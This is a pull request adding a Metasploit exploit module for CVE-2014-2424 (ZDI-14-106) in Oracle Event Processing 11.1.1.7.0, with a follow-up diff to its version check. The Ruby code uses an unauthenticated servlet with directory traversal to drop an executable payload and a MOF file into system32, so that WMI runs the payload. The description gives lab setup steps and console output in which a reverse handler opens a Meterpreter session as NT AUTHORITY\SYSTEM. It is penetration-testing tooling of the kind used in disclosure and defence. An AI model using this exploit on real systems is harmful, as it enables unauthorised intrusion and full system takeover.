### PR TITLE
Add module for ZDI-14-106, Oracle Event Processing

### DIFF
--- a/modules/exploits/windows/http/oracle_event_processing_upload.rb
+++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb
@@ -1,0 +1,128 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload',
+      'Description'    => %q{
+        This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing
+        11.1.1.7.0. The vulnerability exists in the FileUploadServlet, where an arbitrary file
+        can be uploaded without authentication, and due to a directory traversal, to an arbitrary
+        location. By default Oracle Event Processing uses a Jetty Application Server with JSP
+        support not configured. Because of it, this module only targets Windows 2003 SP2, where
+        the WMI service can be abused to convert the file upload into remote code execution without
+        user interaction.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-2424'],
+          ['ZDI', '14-106'],
+          ['BID', '66871'],
+          ['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html']
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 5
+        },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          ['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 21 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9002),
+        # By default, uploads are stored in:
+        # C:\Oracle\Middleware\user_projects\domains\<DOMAIN>\defaultserver\upload\
+        OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+      ], self.class)
+  end
+
+  def upload(file_name, contents)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"")
+    post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"")
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'uri'    => '/wlevs/visualizer/upload',
+      'method' => 'POST',
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data'   => data
+    })
+
+    res
+  end
+
+  def traversal
+    "../" * datastore['DEPTH']
+  end
+
+  def exploit
+    print_status("#{peer} - Generating payload and mof file...")
+    mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
+    exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
+    exe_content = generate_payload_exe
+    mof_content = generate_mof(mof_name, exe_name)
+
+    print_status("#{peer} - Uploading the exe payload #{exe_name}...")
+    exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
+    res = upload(exe_traversal, exe_content)
+
+    unless res && res.code == 200 && res.body.blank?
+      print_error("#{peer} - Unexpected answer, trying anyway...")
+    end
+    register_file_for_cleanup(exe_name)
+
+    print_status("#{peer} - Uploading the MOF file #{mof_name}")
+    mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
+    upload(mof_traversal, mof_content)
+    register_file_for_cleanup("wbem/mof/good/#{mof_name}")
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => '/ohw/help/state',
+      'method' => 'GET',
+      'vars_get'  => {
+        'navSetId' => 'cepvi',
+        'navId' => '0',
+        'destination' => ''
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+end

--- a/modules/exploits/windows/http/oracle_event_processing_upload.rb
+++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb
@@ -118,8 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    if res && res.code == 200 && res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
-      return Exploit::CheckCode::Detected
+    if res && res.code == 200
+      if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
+        return Exploit::CheckCode::Detected
+      elsif res.body.to_s.include?("Oracle Event Processing 12")
+        return Exploit::CheckCode::Safe
+      end
     end
 
     Exploit::CheckCode::Unknown


### PR DESCRIPTION
This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing 11.1.1.7.0. The vulnerability exists in the FileUploadServlet, where an arbitrary file can be uploaded without authentication, and due to a directory traversal, to an arbitrary location. By default Oracle Event Processing uses a Jetty Application Server with JSP support not configured. Because of it, this module only targets Windows 2003 SP2, where the WMI service can be abused to convert the file upload into remote code execution without user interaction.
## Verification
- [x] Install Windows 2003 SP2
- [x] Download Oracle Event Processing 11.1.1.7.0 for Windows and install. I'm not sure if the installer is available anymore from Oracle. Ask me if you are at r7 and need the installer.
- [x] Configure a new domain by using "Start - All Programs - Oracle Event Processing 11gR1 - Tools - Configuration Wizard". 
- [x] Once the new domain is ready start Oracle Event Processing from a CMD, (1) go to `C:\Oracle\Middleware\user_projects\domains\<DOMAIN_NAME>\defaultserver` (2) run `startwlevs.cmd`
- [x] Verify which the app listens on ports 9002 (http) and 9003 (https).
- [x] Run the module like in the demo, you should enjoy session

```
msf > use exploit/windows/http/oracle_event_processing_upload
msf exploit(oracle_event_processing_upload) > set rhost 172.16.158.198
rhost => 172.16.158.198
msf exploit(oracle_event_processing_upload) > check
[*] 172.16.158.198:9002 - The target service is running, but could not be validated.
msf exploit(oracle_event_processing_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.198:9002 - Generating payload and mof file...
[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
[*] 172.16.158.198:9002 - Uploading the MOF file LfXKK.mof
[*] Sending stage (769536 bytes) to 172.16.158.198
[*] Meterpreter session 5 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500
[+] Deleted wbem/mof/good/LfXKK.mof
[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.198 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(oracle_event_processing_upload) > exit -y
```
